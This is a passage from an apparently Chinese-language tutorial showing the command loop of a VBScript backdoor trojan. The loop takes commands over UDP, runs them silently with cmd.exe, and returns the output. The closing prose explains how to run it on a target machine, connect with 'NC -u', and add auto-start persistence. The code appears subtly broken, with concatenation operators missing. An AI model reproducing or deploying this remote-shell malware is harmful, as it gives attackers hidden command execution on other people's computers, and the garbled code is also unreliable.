Do if sock.BytesReceived>0 then sock.getdata revdata,vbString if instr(revdata,"exit")>0 then exit do else on error resume next tempfile="C:\" fso.GetTempName 'cmd=right(revdata,len(revdata)-4) cmd=left(revdata,len(revdata)-3) //利用綁定cmd的輸出 call sc.Run ("cmd.exe /c " cmd " > " tempfile,0,True) Set txf = fso.OpenTextFile(tempfile,1,false,0) //把輸出的文件讀入內存,用SendData發送到客戶端 sock.senddata txf.readall vbcrlf vbcrlf txf.close call fso.DeleteFile(TempFile,True) end if //嘻嘻,下面是我的版權喔 sock.senddata "--End--" vbcrlf "ForHelp exit:end|run:RunFileName>" vbcrlf "Maked by Attrib Data:2004.7.28" vbcrlf vbcrlf end if Loop sock.senddata "連接已關閉!" vbcrlf sock.close sock=nothings ------------------- 到此,代碼的基本架構已經完成了,要想做一個全能的木馬可以在代碼里加上諸如開機自動運行等。由于VBS程序沒有設置出錯保護,可能一些錯誤的操作會出現程蹦潰,有興趣的朋友可以自己試試。用法是先把這個VBS后門運行在服務端,之后就用你的NC連,因為用的是UDP協議,NC的命令行是“NC –u IP Port”,記得要加上那個“-u”參數啊,之后就像WinShell一樣用就行了,下面是在我的機器里測試的截圖。
